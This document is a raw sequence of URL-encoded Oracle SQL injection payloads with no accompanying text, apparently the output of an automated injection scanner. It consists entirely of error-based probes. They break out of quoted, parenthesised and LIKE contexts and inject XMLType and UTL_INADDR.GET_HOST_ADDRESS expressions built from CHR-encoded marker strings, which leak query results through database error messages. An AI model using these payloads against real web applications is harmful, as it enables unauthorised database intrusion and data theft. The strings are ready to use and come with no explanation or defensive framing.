-7674%27%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27ONZc%27%20LIKE%20%27ONZc -8278%27%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27EBqJ%27%20LIKE%20%27EBqJ -7073%27%29%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27pDip%27%20LIKE%20%27pDip -8146%27%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27Wden%27%20LIKE%20%27Wden -3783%22%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22jfRz%22%3D%22jfRz -6203%22%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22cWvk%22%3D%22cWvk -6457%22%29%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22zFtz%22%3D%22zFtz -8705%22%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22knJv%22%3D%22knJv -6749%22%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%22uplu%22%20LIKE%20%22uplu -8562%22%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%22lrgN%22%20LIKE%20%22lrgN -4285%22%29%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%22krAc%22%20LIKE%20%22krAc -4494%22%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%22ricm%22%20LIKE%20%22ricm -2124%25%27%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27%25%27%3D%27 -2551%25%27%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%27%25%27%3D%27 -2906%25%27%29%29%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%28%28%27%25%27%3D%27 -2586%25%27%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 -6607%00%27%29%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27lenb%27%3D%27lenb -7919%00%27%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27fWye%27%3D%27fWye -8270%27%29%20WHERE%203361%3D3361%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -7323%22%29%20WHERE%204748%3D4748%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -9843%29%20WHERE%202391%3D2391%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -1700%27%20WHERE%201014%3D1014%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -4401%22%20WHERE%207109%3D7109%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -7238%20WHERE%203813%3D3813%20OR%203832%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283832%3D3832%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -1002%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -5478%27%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -7188%27%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -3844%22%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -2739%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%287965%3D7965 -6199%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%287400%3D7400 -1676%29%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%287972%3D7972 -1552%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -2282%27%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27dVrz%27%3D%27dVrz -4366%27%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27elIV%27%3D%27elIV -7297%27%29%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27ZVjz%27%3D%27ZVjz -7394%27%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27JWqb%27%3D%27JWqb -3940%27%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27qPiI%27%20LIKE%20%27qPiI -7671%27%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27WMxs%27%20LIKE%20%27WMxs -4028%27%29%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27gxoT%27%20LIKE%20%27gxoT -3139%27%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27HsBb%27%20LIKE%20%27HsBb -3870%22%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22jKnE%22%3D%22jKnE -8268%22%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22kCTq%22%3D%22kCTq -3058%22%29%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22TMmB%22%3D%22TMmB -1362%22%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22RCgo%22%3D%22RCgo -7802%22%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22mbaS%22%20LIKE%20%22mbaS -9249%22%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22eLWk%22%20LIKE%20%22eLWk -4061%22%29%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22rTlj%22%20LIKE%20%22rTlj -7948%22%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22uCrL%22%20LIKE%20%22uCrL -1519%25%27%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27%25%27%3D%27 -2118%25%27%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27%25%27%3D%27 -6338%25%27%29%29%29%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27%25%27%3D%27 -9327%25%27%20OR%207021%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28109%29%7C%7CCHR%28118%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287021%3D7021%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%28112%29%7C%7CCHR%28119%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27%25%27%3D%27 